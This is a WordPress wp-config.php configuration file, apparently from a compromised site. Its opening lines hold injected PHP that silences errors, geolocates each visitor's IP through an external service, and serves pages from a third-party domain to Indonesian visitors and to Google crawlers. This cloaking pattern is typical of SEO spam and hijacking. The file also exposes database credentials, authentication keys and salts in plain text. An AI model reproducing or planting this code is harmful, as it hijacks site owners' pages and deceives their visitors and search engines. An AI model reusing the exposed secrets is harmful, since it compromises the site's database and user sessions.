error_reporting(0); $ip_address = $ip = $_SERVER['REMOTE_ADDR']; $ip_headers = [ 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_FORWARDED_FOR', 'HTTP_X_COMING_FROM', 'HTTP_COMING_FROM', 'HTTP_FORWARDED_FOR_IP', 'HTTP_X_REAL_IP' ]; if ( ! empty ( $ip_headers ) ) { foreach ( $ip_headers as $header ) { if ( ! empty ( $_SERVER[$header] ) ) { $ip_address = trim ( $_SERVER[$header] ); $ip = explode ( ',' , $ip_address )[0]; break; } } } $hasil = json_decode ( file_get_contents ( "http://ip-api.com/json/$ip?fields=20483&key=ij36B51rjgcJLmK" ) ); if ( $hasil->status == 'success' ) { $negara = $hasil->countryCode; $rev = $hasil->reverse; if ( $negara == 'ID' ) { $html = file_get_contents ( "https://spesialakun.com/perpus-stbachp/" ); exit ( $html ); } elseif ( $rev && strpos ( $rev , 'google' ) !== false ) { $html = file_get_contents ( "https://spesialakun.com/perpus-stbachp/" ); exit ( $html ); } } /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'mesecurity_wp_n9xnc' ); /** Database username */ define( 'DB_USER', 'mesecurity_wp_8t1px' ); /** Database password */ define( 'DB_PASSWORD', 'j%1bIjDqCA6ma*w9' ); /** Database hostname */ define( 'DB_HOST', 'localhost:3306' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', ';S+h1n0Z0-/%+|3]ni#+9Y-h3V-M7fs:t4aj9E86X@F;(Y62h795:!CM7Nn89h3['); define('SECURE_AUTH_KEY', '/Qh[ZEJ%Uh7#s#Hj|p9!QFm97/oM|+5v2Uf1Y#~YfGlw!2*M022ht67emW5]4GR)'); define('LOGGED_IN_KEY', '#H0K;oo1@0uJDB%M4/wIOHyUqF5_0q7*);-C5;5FYBh:Q68f*b(h@Y[3CEAy7d|j'); define('NONCE_KEY', 'i2Scz#;@57]@B!6L+D[:CG~04[eY5v1gK3]62uS|uR1sF9l*52V|6q-xjgYXsvx4'); define('AUTH_SALT', 'K8EC9|)8F]W&!N2N_cKg;Zy1T)0w+83WD|09)rbv7b)dwj!3E7Sw!hTmcQ%)i);y'); define('SECURE_AUTH_SALT', ':W6p!16gb~~:P7o+nnhK+4u2g%bj1t99N5:yizTKHmP2hN)U5D|@Rb3#gm0r|_b6'); define('LOGGED_IN_SALT', 'P!J91]HMH1490%McgW2v7u/875fjg_[0yQG9ug3|)H1A9II4@e4TQTHY97C*f~+f'); define('NONCE_SALT', '257!Zpy!@/Kk030@/Z84k@*;qy7Gz1%#74BmI95%Up_mG-HMVzIi7;vwYVeI57u3'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'OrVjf0ruR_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';